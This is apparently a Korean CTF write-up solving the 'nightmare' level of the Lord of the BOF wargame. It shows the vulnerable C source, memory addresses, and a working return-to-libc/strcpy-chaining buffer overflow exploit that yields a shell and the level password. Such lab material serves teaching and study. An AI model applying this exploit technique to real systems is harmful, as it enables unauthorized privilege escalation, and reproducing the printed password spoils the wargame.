[LOB] Level18: succubus → nightmare

nightmare

/*
        The Lord of the BOF : The Fellowship of the BOF
        - nightmare
        - PLT
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>

main(int argc, char *argv[])
{
	char buffer[40];
	char *addr;

	if(argc < 2){
		printf("argv error\n");
		exit(0);
	}

	// check address
	addr = (char *)&strcpy;
    if(memcmp(argv[1]+44, &addr, 4) != 0){
        printf("You must fall in love with strcpy()\n");
        exit(0);
    }

    // overflow!
    strcpy(buffer, argv[1]);
	printf("%s\n", buffer);

	// dangerous waterfall
	memset(buffer+40+8, 'A', 4);
}

strcpy = 0x8048410

system = 0x40058ae0

ebp-40 = 0xbffffaa0

"/bin/sh" = 0x400fbff9

ret+4 = 0xbffffad0

[succubus@localhost succubus]$ ./nightmare `python -c 'print "\xe0\x8a\x05\x40"+"A"*4+"\xf9\xbf\x0f\x40"+"A"*32+"\x10\x84\x04\x08"+"A"*4+"\xd0\xfa\xff\xbf"+"\xa0\xfa\xff\xbf"'`
�@AAAA�@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������
bash$ my-pass
euid = 518
beg for me
bash$ id
uid=517(succubus) gid=517(succubus) euid=518(nightmare) egid=518(nightmare) groups=517(succubus)

 

nightmare / beg for me

 

잘못 된 개념을 서술하였거나, 잘못 풀이된 내용이 있으면 댓글 달아주시면 감사합니다 :) 태클 댓글이나 메일(513.eunice@gmail.com) 환영입니다 !! 😊☺️👍